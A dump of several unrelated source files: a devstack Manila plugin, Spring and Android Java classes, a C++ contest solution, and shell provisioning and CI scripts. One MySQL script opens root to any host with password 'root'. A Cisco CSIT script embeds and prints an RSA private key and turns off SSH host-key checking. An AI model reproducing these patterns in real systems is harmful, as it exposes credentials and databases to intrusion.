echo "debug bgp updates"
) | sudo tee /etc/quagga/bgpd.conf > /dev/null
# Quagga logging
sudo mkdir -p /var/log/quagga
sudo touch /var/log/quagga/zebra.log
sudo touch /var/log/quagga/bgpd.log
sudo chown -R quagga:quagga /var/log/quagga
GetOSVersion
QUAGGA_SERVICES="zebra bgpd"
if [[ is_ubuntu && "$os_CODENAME" == "xenial" ]]; then
# In Ubuntu Xenial, the services bgpd and zebra are under
# one systemd unit: quagga
QUAGGA_SERVICES="quagga"
elif is_fedora; then
# Disable SELinux rule that conflicts with Zebra
sudo setsebool -P zebra_write_config 1
fi
sudo systemctl enable $QUAGGA_SERVICES
sudo systemctl restart $QUAGGA_SERVICES
# log the systemd status
sudo systemctl status $QUAGGA_SERVICES
# This will fail with mutltiple default routes and is not needed in CI
# but may be useful when developing with devstack locally
if [ $(trueorfalse False MANILA_RESTORE_IPV6_DEFAULT_ROUTE) == True ]; then
# add default IPv6 route back
if ! [[ -z $default_route ]]; then
# "replace" should ignore "RTNETLINK answers: File exists"
# error if the route wasn't flushed by the bgp setup we did earlier.
sudo ip -6 route replace $default_route
fi
fi
}
# Main dispatcher
if [[ "$1" == "stack" && "$2" == "install" ]]; then
echo_summary "Installing Manila Client"
install_manilaclient
echo_summary "Installing Manila"
install_manila
set_cinder_quotas
elif [[ "$1" == "stack" && "$2" == "post-config" ]]; then
echo_summary "Configuring Manila"
configure_manila
echo_summary "Initializing Manila"
init_manila
echo_summary "Installing extra libraries"
install_libraries
echo_summary "Creating Manila entities for auth service"
create_manila_accounts
# Cinder config update
if is_service_enabled cinder && [[ -n "$CINDER_OVERSUBSCRIPTION_RATIO" ]]; then
CINDER_CONF=${CINDER_CONF:-/etc/cinder/cinder.conf}
CINDER_ENABLED_BACKENDS=$(iniget $CINDER_CONF DEFAULT enabled_backends)
for BN in ${CINDER_ENABLED_BACKENDS//,/ }; do
iniset $CINDER_CONF $BN lvm_max_over_subscription_ratio $CINDER_OVERSUBSCRIPTION_RATIO
done
iniset $CINDER_CONF DEFAULT max_over_subscription_ratio $CINDER_OVERSUBSCRIPTION_RATIO
fi
elif [[ "$1" == "stack" && "$2" == "extra" ]]; then
if is_service_enabled nova; then
echo_summary "Creating Manila service flavor"
create_manila_service_flavor
echo_summary "Creating Manila service security group"
create_manila_service_secgroup
fi
# Skip image downloads when disabled.
# This way vendor Manila driver CI tests can skip
# this potentially long and unnecessary download.
if [ "$MANILA_SERVICE_IMAGE_ENABLED" = "True" ]; then
echo_summary "Creating Manila service image"
create_manila_service_image
else
echo_summary "Skipping download of Manila service image"
fi
if is_service_enabled nova; then
echo_summary "Creating Manila service keypair"
create_manila_service_keypair
fi
echo_summary "Configure Samba server"
configure_samba
echo_summary "Configuring IPv6"
if [ $(trueorfalse False MANILA_SETUP_IPV6) == True ]; then
setup_ipv6
fi
echo_summary "Starting Manila API"
start_manila_api
# Workaround for bug #1660304
if [ "$SHARE_DRIVER" != "manila.share.drivers.generic.GenericShareDriver" ]; then
echo_summary "Starting rest of Manila services - scheduler, share and data"
start_rest_of_manila
fi
echo_summary "Creating Manila default share type"
create_default_share_type
echo_summary "Creating Manila default share group type"
create_default_share_group_type
echo_summary "Creating Manila custom share types"
create_custom_share_types
echo_summary "Manila UI is no longer enabled by default. \
Add enable_plugin manila-ui https://opendev.org/openstack/manila-ui \
to your local.conf file to enable Manila UI"
elif [[ "$1" == "stack" && "$2" == "test-config" ]]; then
###########################################################################
# NOTE(vponomaryov): Workaround for bug #1660304
# We are able to create Nova VMs now only when last Nova step is performed
# which is registration of cell0. It is registered as last action in
# "post-extra" section.
if is_service_enabled nova; then
echo_summary "Creating Manila service VMs for generic driver \
backends for which handlng of share servers is disabled."
create_service_share_servers
fi
if [ "$SHARE_DRIVER" == "manila.share.drivers.generic.GenericShareDriver" ]; then
echo_summary "Starting rest of Manila services - scheduler, share and data"
start_rest_of_manila
fi
###########################################################################
if [ $(trueorfalse False MANILA_INSTALL_TEMPEST_PLUGIN_SYSTEMWIDE) == True ]; then
echo_summary "Fetching and installing manila-tempest-plugin system-wide"
install_manila_tempest_plugin
export DEPRECATED_TEXT="$DEPRECATED_TEXT\nInstalling
manila-tempest-plugin can be done with the help of its own DevStack
plugin by adding: \n\n\t'enable_plugin manila-tempest-plugin
https://opendev.org/openstack/manila-tempest-plugin'.\n\nManila's
DevStack plugin will stop installing it automatically."
fi
echo_summary "Update Tempest config"
update_tempest
fi
if [[ "$1" == "unstack" ]]; then
cleanup_manila
fi
if [[ "$1" == "clean" ]]; then
cleanup_manila
sudo rm -rf /etc/manila
fi
# Restore xtrace
$XTRACE
|
package io.github.marcelbraghetto.sunshinewatch.framework.core.dagger;
import android.content.Context;
import android.support.annotation.NonNull;
/**
* Created by <NAME> on 30/04/16.
*
* Dependency injector - lazily created to also allow Dagger to be available from any Android
* component that has a context.
*/
public final class Injector {
private static InjectorComponent sAppComponent;
private Injector() { }
/**
* Obtain the shared instance of the injector for dependency injection.
* @param context needed to resolve the injector.
* @return shared instance of the dependency injector.
*/
@NonNull
public static synchronized InjectorComponent get(@NonNull Context context) {
if(sAppComponent == null) {
sAppComponent = DaggerInjectorComponent
.builder()
.injectorDaggerModule(new InjectorDaggerModule(context.getApplicationContext()))
.build();
}
return sAppComponent;
}
}
|
<reponame>unixing/springboot_chowder<gh_stars>10-100
package com.oven.controller;
import com.oven.utils.FileUtils;
import org.springframework.core.io.Resource;
import org.springframework.http.HttpHeaders;
import org.springframework.http.ResponseEntity;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.util.StringUtils;
import org.springframework.web.bind.annotation.*;
import org.springframework.web.multipart.MultipartFile;
import org.springframework.web.servlet.mvc.method.annotation.MvcUriComponentsBuilder;
import org.springframework.web.servlet.mvc.support.RedirectAttributes;
import java.util.stream.Collectors;
@Controller
public class DemoController {
@javax.annotation.Resource
private FileUtils fileUtils;
@GetMapping("/")
public String index(Model model) {
model.addAttribute("files", fileUtils
.list()
.map(path -> MvcUriComponentsBuilder
.fromMethodName(DemoController.class, "download", path.getFileName().toString())
.build()
.toString())
.collect(Collectors.toList()));
return "upload";
}
@GetMapping("/files/{filename:.+}")
@ResponseBody
public ResponseEntity<Resource> download(@PathVariable String filename) {
Resource file = fileUtils.loadAsResource(filename);
return ResponseEntity
.ok()
.header(HttpHeaders.CONTENT_DISPOSITION, "attachment; filename=\"" + file.getFilename() + "\"")
.body(file);
}
@PostMapping("/")
public String upload(@RequestParam("file") MultipartFile file, RedirectAttributes redirectAttributes) {
if (StringUtils.isEmpty(file.getOriginalFilename())) {
redirectAttributes.addFlashAttribute("message", "请选择文件!");
return "redirect:/";
}
fileUtils.upload(file);
redirectAttributes.addFlashAttribute("message", "上传【" + file.getOriginalFilename() + "】成功!");
return "redirect:/";
}
}
|
package kr.co.gardener.admin.controller.user;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.ResponseBody;
import kr.co.gardener.admin.model.user.History;
import kr.co.gardener.admin.model.user.list.BookmarkList;
import kr.co.gardener.admin.model.user.list.HistoryList;
import kr.co.gardener.admin.service.user.BookmarkService;
import kr.co.gardener.admin.service.user.HistoryService;
import kr.co.gardener.util.Pager;
@Controller
@RequestMapping("/admin/history")
public class HistoryController {
final String path = "/admin/users/history/";
@Autowired
HistoryService service;
@Autowired
BookmarkService bookmarkService;
@RequestMapping({ "/", "" })
public String list(Model model) {
return path + "main";
}
@GetMapping("/add")
public String add() {
return path + "add";
}
@PostMapping("/add")
public String add(History item) {
service.add(item);
return "redirect:list";
}
@GetMapping("/update/{historyId}")
public String update(@PathVariable int historyId, Model model) {
History item = service.item(historyId);
model.addAttribute("item", item);
return path + "update";
}
@PostMapping("/update/{historyId}")
public String update(@PathVariable int historyId, History item) {
item.setHistoryId(historyId);
service.update(item);
return "redirect:../list";
}
@RequestMapping("/delete/{historyId}")
public String delete(@PathVariable int historyId) {
service.delete(historyId);
return "redirect:../list";
}
// 즐겨찾기 대량 --------------------------------------------
@RequestMapping("/api/bookmark")
@ResponseBody
public BookmarkList bookmarkList(Pager pager) {
BookmarkList item = bookmarkService.list_pager(pager);
return item;
}
@ResponseBody
@PostMapping("/add/bookmark")
public String bookmarkAdd(@RequestBody BookmarkList list) {
bookmarkService.insert_list(list);
return "ok";
}
@ResponseBody
@RequestMapping("/delete/bookmark")
public String bookmarkDelete(@RequestBody BookmarkList list) {
bookmarkService.delete_list(list);
return "ok";
}
@ResponseBody
@PostMapping("/update/bookmark")
public String bookmarkUpdate(@RequestBody BookmarkList list) {
bookmarkService.update_list(list);
return "ok";
}
// 인증 기록 대량 --------------------------------------------
@RequestMapping("/api/history")
@ResponseBody
public HistoryList historyList(Pager pager) {
HistoryList item = service.list_pager(pager);
return item;
}
@ResponseBody
@PostMapping("/add/history")
public String historyAdd(@RequestBody HistoryList list) {
service.insert_list(list);
return "ok";
}
@ResponseBody
@RequestMapping("/delete/history")
public String historyDelete(@RequestBody HistoryList list) {
service.delete_list(list);
return "ok";
}
@ResponseBody
@PostMapping("/update/history")
public String historyUpdate(@RequestBody HistoryList list) {
service.update_list(list);
return "ok";
}
}
|
#include<bits/stdc++.h>
using namespace std;
// string convert2Bin(long long int num) {
// if(num == 1) return "1";
// string result = "";
// long long int size = 0;
// long long int n = num;
// while(n) {
// if(n%2 == 0) result = '0' + result;
// else {
// result = '1' + result;
// }
// n = long long int(n/2);
// ++size;
// }
// return result;
// }
// long long int findMax(long long int num) {
// // string n = convert2Bin(num);
// string n = "100101";
// string a = "", b = "";
// long long int size = n.length();
// for(long long int i=size-1; i>=0; i--) {
// if(i==0) {
// a = '1' + a;
// b = '0' + b;
// }
// else if(n[i] == '0') {
// a = '1' + a;
// b = '1' + b;
// }
// else {
// a = '0' + a;
// b = '1' + b;
// }
// }
// long long int A = stoi(a, 0, 2);
// long long int B = stoi(b, 0, 2);
// long long int N = stoi(n, 0, 2);
// cout << "N: " << N << endl;
// cout << a << ": " << A << endl;
// cout << b << ": " << B << endl;
// return A * B;
// }
long long int findNumOfBits(long long int num){
long long int size = 0;
while(num) {
num = num/2;
++size;
}
return size;
}
long long int findMax(long long int num) {
long long int size = findNumOfBits(num);
long long int b = pow(2, size-1) - 1;
long long int a = num ^ b;
return a*b;
}
int main() {
long long int t;
cin >> t;
while(t) {
long long int n;
cin >> n;
// cout << convert2Bin(n) << endl;
cout << findMax(n) << endl;
--t;
}
} |
#!/bin/bash
disk_info=$(df -h / | awk '/\//{ printf("%4s/%s \n", $4, $2) }')
echo ${disk_info}
|
#!/usr/bin/env bash
sudo apt-get update
sudo debconf-set-selections <<< 'mysql-server mysql-server/root_password password root'
sudo debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password root'
sudo apt-get install -y --force-yes vim curl python-software-properties
sudo apt-get update --fix-missing
sudo apt-get -y --force-yes install mysql-server
sed -i "s/^bind-address/#bind-address/" /etc/mysql/my.cnf
mysql -u root -proot -e "CREATE USER 'root'@'%' IDENTIFIED BY 'root';GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES; SET GLOBAL max_connect_errors=10000;"
sudo /etc/init.d/mysql restart
|
#!/bin/bash
# Copyright (c) 2017 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -x
cat /etc/hostname
cat /etc/hosts
ARCHIVE_ARTIFACTS=(log.html output.xml report.html)
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
export PYTHONPATH=${SCRIPT_DIR}
export DEBIAN_FRONTEND=noninteractive
sudo apt-get -y update
sudo apt-get -y install libpython2.7-dev python-virtualenv
VIRL_SERVERS=("10.30.51.28" "10.30.51.29" "10.30.51.30")
VIRL_SERVER=""
VIRL_USERNAME=jenkins-in
VIRL_PKEY=priv_key
VIRL_SERVER_STATUS_FILE="status"
VIRL_SERVER_EXPECTED_STATUS="PRODUCTION"
SSH_OPTIONS="-i ${VIRL_PKEY} -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o BatchMode=yes -o LogLevel=error"
DPDK_VERSION=16.11.1
DPDK_DIR=dpdk
DPDK_PACKAGE=${DPDK_DIR}"-"${DPDK_VERSION}.tar.xz
function ssh_do() {
echo
echo "### " ssh $@
ssh ${SSH_OPTIONS} $@
}
rm -f ${VIRL_PKEY}
cat > ${VIRL_PKEY} <<EOF
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA+IHXq87GcqMR1C47rzx6Cbip5Ghq8pKrbqKrP5Nf41HcYrT6
GOXl9nFWKsMOzIlIn+8y7Il27eZh7csQGApbg8QLiHMtcYEmWNzKZpkqg4nuAPxX
VXwlKgnKX902SrET9Gp9TDayiHtCRWVfrlPPPSA0UEXW6BjLN/uHJ+W/Xzrrab+9
asBVa05vT2W6n0KJ66zfCaeDM912mQ6SttscAwFoWDmdHlegiVqrlIG2ABxOvxxz
L3dM3iSmlmQlzv9bThjo+nI4KFYh6m5wrZmAo5r/4q9CIJc21HVnTqkGOWJIZz6J
73lePJVSq5gYqaoGw3swFEA/MDkOx7baWKSoLQIDAQABAoIBAQCNBeolNp+JWJ76
gQ4fwLsknyXSV6sxYyhkDW4PEwwcTU06uqce0AAzXVffxne0fMe48x47+zqBgPbb
4huM+Pu8B9nfojUMr5TaYtl9Zbgpk3F8H7dT7LKOa6XrxvZTZrADSRc30+Z26zPN
e9zTaf42Gvt0/l0Zs1BHwbaOXqO+XuwJ3/F9Sf3PQYWXD3EOWjpHDP/X/1vAs6lV
SLkm6J/9KKE1m6I6LTYjIXuYt4SXybW6N2TSy54hhQtYcDUnIU2hR/PHVWKrGA0J
kELgrtTNTdbML27O5gFWU4PLUEYTZ9fN11D6qUZKxLcPOiPPHXkiILMRCCnG5DYI
ksBAU/YlAoGBAPxZO9VO18TYc8THV1nLKcvT2+1oSs1UcA2wNQMU55t910ZYinRa
MRwUhMOf8Mv5wOeiZaRICQB1PnVWtDVmGECgPpK6jUxqAwn8rgJcnoafLGL5YKMY
RVafTe6N5LXgCaOcJrk21wxs6v7ninEbUxxc575urOvZMBkymDw91dwbAoGBAPwa
YRhKhrzFKZzdK0RadVjnxKvolUllpoqqg3XuvmeAJHAOAnaOgVWq68NAcp5FZJv0
2D2Up7TX8pjf9MofP1SJbcraKBpK4NzfNkA0dSdEi+FhVofAJ9umB2o5LW1n7sab
UIrjsdzSJK/9Zb9yTTHPyibYzNEgaJV1HsbxfEFXAoGAYO2RmvRm0phll18OQVJV
IpKk9kLKAKZ/R/K32hAsikBC8SVPQTPniyaifFWx81diblalff2hX4ipTf7Yx24I
wMIMZuW7Im/R7QMef4+94G3Bad7p7JuE/qnAEHJ2OBnu+eYfxaK35XDsrq6XMazS
NqHE7hOq3giVfgg+C12hCKMCgYEAtu9dbYcG5owbehxzfRI2/OCRsjz/t1bv1seM
xVMND4XI6xb/apBWAZgZpIFrqrWoIBM3ptfsKipZe91ngBPUnL9s0Dolx452RVAj
yctHB8uRxWYgqDkjsxtzXf1HnZBBkBS8CUzYj+hdfuddoeKLaY3invXLCiV+PpXS
U4KAK9kCgYEAtSv0m5+Fg74BbAiFB6kCh11FYkW94YI6B/E2D/uVTD5dJhyEUFgZ
cWsudXjMki8734WSpMBqBp/J8wG3C9ZS6IpQD+U7UXA+roB7Qr+j4TqtWfM+87Rh
maOpG56uAyR0w5Z9BhwzA3VakibVk9KwDgZ29WtKFzuATLFnOtCS46E=
-----END RSA PRIVATE KEY-----
EOF
chmod 600 ${VIRL_PKEY}
#
# Pick a random host from the array of VIRL servers, and attempt
# to reach it and verify it's status.
#
# The server must be reachable, and have a "status" file with
# the content "PRODUCTION", to be selected.
#
# If the server is not reachable, or does not have the correct
# status, remove it from the array and start again.
#
# Abort if there are no more servers left in the array.
#
while [[ ! "$VIRL_SERVER" ]]
do
num_hosts=${#VIRL_SERVERS[@]}
if [ $num_hosts == 0 ]
then
echo "No more VIRL candidate hosts available, failing."
exit 127
fi
element=$[ $RANDOM % $num_hosts ]
virl_server_candidate=${VIRL_SERVERS[$element]}
virl_server_status=$(ssh ${SSH_OPTIONS} ${VIRL_USERNAME}@${virl_server_candidate} cat $VIRL_SERVER_STATUS_FILE 2>&1)
echo VIRL HOST $virl_server_candidate status is \"$virl_server_status\"
if [ "$virl_server_status" == "$VIRL_SERVER_EXPECTED_STATUS" ]
then
# Candidate is in good status. Select this server.
VIRL_SERVER="$virl_server_candidate"
else
# Candidate is in bad status. Remove from array.
VIRL_SERVERS=("${VIRL_SERVERS[@]:0:$element}" "${VIRL_SERVERS[@]:$[$element+1]}")
fi
done
#we will pack all the TLDK depend files and copy it to the VIRL_SERVER
VIRL_DIR_LOC="/tmp"
TLDK_TAR_FILE="tldk_depends.tar.gz"
wget "fast.dpdk.org/rel/${DPDK_PACKAGE}"
tar zcf ${TLDK_TAR_FILE} ${DPDK_PACKAGE} ./tldk/ \
./tests/tldk/tldk_testconfig/
cat ${VIRL_PKEY}
# Copy the files to VIRL host
scp ${SSH_OPTIONS} ${TLDK_TAR_FILE} \
${VIRL_USERNAME}@${VIRL_SERVER}:${VIRL_DIR_LOC}/
result=$?
if [ "${result}" -ne "0" ]; then
echo "Failed to copy tldk package file to virl host"
echo ${result}
exit ${result}
fi
# Start a simulation on VIRL server
echo "Starting simulation on VIRL server"
VIRL_TOPOLOGY=double-ring-nested.xenial
VIRL_RELEASE=csit-ubuntu-16.04.1_2017-07-26_1.9
function stop_virl_simulation {
ssh ${SSH_OPTIONS} ${VIRL_USERNAME}@${VIRL_SERVER}\
"stop-testcase ${VIRL_SID}"
}
# Upon script exit, cleanup the simulation execution
trap stop_virl_simulation EXIT
# use the start-testcase-TLDK for the TLDK test case
VIRL_SID=$(ssh ${SSH_OPTIONS} \
${VIRL_USERNAME}@${VIRL_SERVER} \
"start-testcase-TLDK -c ${VIRL_TOPOLOGY} -r ${VIRL_RELEASE} ${VIRL_DIR_LOC}/${TLDK_TAR_FILE}")
retval=$?
if [ "${retval}" -ne "0" ]; then
echo "VIRL simulation start failed"
exit ${retval}
fi
if [[ ! "${VIRL_SID}" =~ session-[a-zA-Z0-9_]{6} ]]; then
echo "No VIRL session ID reported."
exit 127
fi
echo ${VIRL_SID}
ssh_do ${VIRL_USERNAME}@${VIRL_SERVER} cat /scratch/${VIRL_SID}/topology.yaml
# Download the topology file from virl session
scp ${SSH_OPTIONS} \
${VIRL_USERNAME}@${VIRL_SERVER}:/scratch/${VIRL_SID}/topology.yaml \
topologies/enabled/topology.yaml
retval=$?
if [ "${retval}" -ne "0" ]; then
echo "Failed to copy topology file from VIRL simulation"
exit ${retval}
fi
# create a python virtual environment env
virtualenv --system-site-packages env
. env/bin/activate
echo pip install
pip install -r ${SCRIPT_DIR}/requirements.txt
pykwalify -s ${SCRIPT_DIR}/resources/topology_schemas/3_node_topology.sch.yaml \
-s ${SCRIPT_DIR}/resources/topology_schemas/topology.sch.yaml \
-d ${SCRIPT_DIR}/topologies/enabled/topology.yaml \
-vvv
if [ "$?" -ne "0" ]; then
echo "Topology schema validation failed."
echo "However, the tests will start."
fi
PYTHONPATH=`pwd` pybot -L TRACE -W 150 \
-v TOPOLOGY_PATH:${SCRIPT_DIR}/topologies/enabled/topology.yaml \
--suite "tests.tldk.func" \
--include vm_envAND3_node_single_link_topo \
--noncritical EXPECTED_FAILING \
tests/
RETURN_STATUS=$(echo $?)
# Archive artifacts
mkdir archive
for i in ${ARCHIVE_ARTIFACTS[@]}; do
cp $( readlink -f ${i} | tr '\n' ' ' ) archive/
done
exit ${RETURN_STATUS}
|
package io.opensphere.core.help.data;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.List;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Marshaller;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
import javax.xml.bind.annotation.XmlElement;
import javax.xml.bind.annotation.XmlRootElement;
import org.apache.log4j.Logger;
import io.opensphere.core.util.JAXBContextHelper;
/**
* This will be the top level of the help mapping contents.
*/
@XmlRootElement(name = "map")
@XmlAccessorType(XmlAccessType.NONE)
public class HelpMap
{
/** Logger reference. */
private static final Logger LOGGER = Logger.getLogger(HelpMap.class);
/** The list of mapping entries. */
@XmlElement(name = "mapID")
private final List<HelpMapEntry> myMappingEntries;
/**
* Default constructor.
*/
public HelpMap()
{
myMappingEntries = new ArrayList<>();
}
/**
* Add mapping entries from another top level list to my list of mappings.
*
* @param mapList The other mappings list to copy to my own.
* @return True if successful, false otherwise.
*/
public boolean add(HelpMap mapList)
{
if (mapList == null || mapList.getMapEntries().isEmpty())
{
return false;
}
boolean result = true;
for (HelpMapEntry entry : mapList.getMapEntries())
{
result &= myMappingEntries.add(entry);
}
return result;
}
/**
* Add a mapping entry to my list of entries.
*
* @param entry The mapping entry to add.
* @return True if successful, false otherwise.
*/
public boolean add(HelpMapEntry entry)
{
return myMappingEntries.add(entry);
}
/**
* Accessor for the list of mapping entries.
*
* @return The list of mapping entries.
*/
public List<HelpMapEntry> getMapEntries()
{
return myMappingEntries;
}
/**
* Remove from my mappings entries at the specified index.
*
* @param index The index to remove.
* @return True if successful, false otherwise.
*/
public HelpMapEntry remove(int index)
{
return myMappingEntries.remove(index);
}
/**
* Remove the given mapping entry from my mappings list.
*
* @param entry The mapping entry to remove
* @return True if successful, false otherwise.
*/
public boolean remove(Object entry)
{
return myMappingEntries.remove(entry);
}
/**
* Convenience method to put the XML of this class into a string.
*
* @return String representation of the XML of this class.
*/
public String toXml()
{
JAXBContext c = null;
Marshaller m = null;
StringWriter sw = new StringWriter();
try
{
c = JAXBContextHelper.getCachedContext(HelpMap.class);
m = c.createMarshaller();
m.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, Boolean.TRUE);
m.marshal(this, sw);
}
catch (JAXBException e)
{
LOGGER.error("Unable to create help mapping XML string: " + e.getMessage());
}
return sw.toString();
}
}
|
# test uPy ujson behaviour that's not valid in CPy
try:
import ujson
except ImportError:
print("SKIP")
raise SystemExit
print(ujson.dumps(b'1234'))
|
package de.ids_mannheim.korap.web.controller;
import java.util.List;
import javax.ws.rs.Consumes;
import javax.ws.rs.DELETE;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.PUT;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.QueryParam;
import javax.ws.rs.core.Context;
import javax.ws.rs.core.MediaType;
import javax.ws.rs.core.Response;
import javax.ws.rs.core.Response.Status;
import javax.ws.rs.core.SecurityContext;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import com.fasterxml.jackson.databind.JsonNode;
import com.sun.jersey.spi.container.ResourceFilters;
import de.ids_mannheim.korap.constant.OAuth2Scope;
import de.ids_mannheim.korap.constant.QueryType;
import de.ids_mannheim.korap.constant.ResourceType;
import de.ids_mannheim.korap.dto.QueryAccessDto;
import de.ids_mannheim.korap.dto.QueryDto;
import de.ids_mannheim.korap.exceptions.KustvaktException;
import de.ids_mannheim.korap.oauth2.service.OAuth2ScopeService;
import de.ids_mannheim.korap.security.context.TokenContext;
import de.ids_mannheim.korap.service.QueryService;
import de.ids_mannheim.korap.utils.ParameterChecker;
import de.ids_mannheim.korap.web.KustvaktResponseHandler;
import de.ids_mannheim.korap.web.filter.APIVersionFilter;
import de.ids_mannheim.korap.web.filter.AuthenticationFilter;
import de.ids_mannheim.korap.web.filter.BlockingFilter;
import de.ids_mannheim.korap.web.filter.DemoUserFilter;
import de.ids_mannheim.korap.web.filter.PiwikFilter;
import de.ids_mannheim.korap.web.input.QueryJson;
/**
* VirtualCorpusController defines web APIs related to virtual corpus
* (VC) such as creating, deleting and listing user virtual corpora.
* All the APIs in this class are available to logged-in users, except
* retrieving info of system VC.
*
* This class also includes APIs related to virtual corpus access
* (VCA) such as sharing and publishing VC. When a VC is published,
* it is shared with all users, but not always listed like system
* VC. It is listed for a user, once when he/she have searched for the
* VC. A VC can be published by creating or editing the VC.
*
* VC name must follow the following regex [a-zA-Z_0-9-.], other
* characters are not allowed.
*
* @author margaretha
*
*/
@Controller
@Path("{version}/vc")
@ResourceFilters({ APIVersionFilter.class, AuthenticationFilter.class,
BlockingFilter.class, PiwikFilter.class })
public class VirtualCorpusController {
@Autowired
private KustvaktResponseHandler kustvaktResponseHandler;
@Autowired
private QueryService service;
@Autowired
private OAuth2ScopeService scopeService;
/**
* Creates a new VC with the given VC creator and VC name
* specified as the path parameters. If a VC with the same name
* and creator exists, the VC will be updated instead.
*
* VC name cannot be updated.
*
* The VC creator must be the same as the authenticated username,
* except for admins. Admins can create or update system VC as
* well as VC for any users.
*
*
* @param securityContext
* @param vcCreator
* the username of the vc creator, must be the same
* as the authenticated username, except admins
* @param vcName
* the vc name
* @param vc
* a json object describing the VC
* @return HTTP Status 201 Created when creating a new VC, or 204
* No Content when updating an existing VC.
* @throws KustvaktException
*/
@PUT
@Path("/~{vcCreator}/{vcName}")
@Consumes(MediaType.APPLICATION_JSON + ";charset=utf-8")
public Response createUpdateVC (@Context SecurityContext securityContext,
@PathParam("vcCreator") String vcCreator,
@PathParam("vcName") String vcName,
QueryJson vc) throws KustvaktException {
TokenContext context =
(TokenContext) securityContext.getUserPrincipal();
try {
scopeService.verifyScope(context, OAuth2Scope.EDIT_VC);
ParameterChecker.checkObjectValue(vc, "request entity");
if (vc.getQueryType() == null) {
vc.setQueryType(QueryType.VIRTUAL_CORPUS);
}
Status status = service.handlePutRequest(context.getUsername(),
vcCreator, vcName, vc);
return Response.status(status).build();
}
catch (KustvaktException e) {
throw kustvaktResponseHandler.throwit(e);
}
}
/**
* Returns the virtual corpus with the given name and creator.
* This web-service is also available for guests.
*
* @param securityContext
* @param createdBy
* vc creator
* @param vcName
* vc name
* @return the virtual corpus with the given name and creator.
*/
@GET
@Path("~{createdBy}/{vcName}")
@Produces(MediaType.APPLICATION_JSON + ";charset=utf-8")
@ResourceFilters({ APIVersionFilter.class, AuthenticationFilter.class,
DemoUserFilter.class, PiwikFilter.class })
public QueryDto retrieveVCByName (
@Context SecurityContext securityContext,
@PathParam("createdBy") String createdBy,
@PathParam("vcName") String vcName) {
TokenContext context =
(TokenContext) securityContext.getUserPrincipal();
try {
scopeService.verifyScope(context, OAuth2Scope.VC_INFO);
return service.retrieveQueryByName(context.getUsername(), vcName,
createdBy, QueryType.VIRTUAL_CORPUS);
}
catch (KustvaktException e) {
throw kustvaktResponseHandler.throwit(e);
}
}
@GET
@Path("/koralQuery/~{createdBy}/{vcName}")
@Produces(MediaType.APPLICATION_JSON + ";charset=utf-8")
public JsonNode retrieveVCKoralQuery (
@Context SecurityContext securityContext,
@PathParam("createdBy") String createdBy,
@PathParam("vcName") String vcName) {
TokenContext context =
(TokenContext) securityContext.getUserPrincipal();
try {
scopeService.verifyScope(context, OAuth2Scope.VC_INFO);
return service.retrieveKoralQuery(context.getUsername(), vcName,
createdBy, QueryType.VIRTUAL_CORPUS);
}
catch (KustvaktException e) {
throw kustvaktResponseHandler.throwit(e);
}
}
/**
* Lists all virtual corpora available to the authenticated user.
*
* System-admins can list available vc for a specific user by
* specifiying the username parameter.
*
* Normal users cannot list virtual corpora
* available for other users. Thus, username parameter is optional
* and must be identical to the authenticated username.
*
* @param securityContext
* @param username
* a username (optional)
* @return a list of virtual corpora
*/
@GET
@Produces(MediaType.APPLICATION_JSON + ";charset=utf-8")
public List<QueryDto> listAvailableVC (
@Context SecurityContext securityContext,
@QueryParam("username") String username) {
TokenContext context =
(TokenContext) securityContext.getUserPrincipal();
try {
scopeService.verifyScope(context, OAuth2Scope.VC_INFO);
return service.listAvailableQueryForUser(context.getUsername(),
username, QueryType.VIRTUAL_CORPUS);
}
catch (KustvaktException e) {
throw kustvaktResponseHandler.throwit(e);
}
}
/**
* Lists all system virtual corpora, if PathParam
* <em>createdBy</em> is specified to system or SYSTEM.
* Otherwise, lists all virtual corpora created by the given user.
*
* This web-service is only available to the owner of the vc.
* Users, except system-admins, are not allowed to list vc created
* by other users.
*
* Beside "system or SYSTEM', the path parameter "createdBy" must
* be the same as the
* authenticated username.
*
* @param createdBy
* system or username
* @param securityContext
* @return all system VC, if createdBy=system, otherwise a list of
* virtual corpora created by the authorized user.
*/
@GET
@Path("~{createdBy}")
@Produces(MediaType.APPLICATION_JSON + ";charset=utf-8")
public List<QueryDto> listUserOrSystemVC (
@PathParam("createdBy") String createdBy,
@Context SecurityContext securityContext) {
TokenContext context =
(TokenContext) securityContext.getUserPrincipal();
try {
scopeService.verifyScope(context, OAuth2Scope.VC_INFO);
if (createdBy.toLowerCase().equals("system")) {
return service.listSystemQuery(QueryType.VIRTUAL_CORPUS);
}
else {
return service.listOwnerQuery(context.getUsername(), createdBy,
QueryType.VIRTUAL_CORPUS);
}
}
catch (KustvaktException e) {
throw kustvaktResponseHandler.throwit(e);
}
}
/**
* Lists virtual corpora by creator and type. This is a controller
* for system admin requiring valid system admin authentication.
*
* If type is not specified, retrieves virtual corpora of all
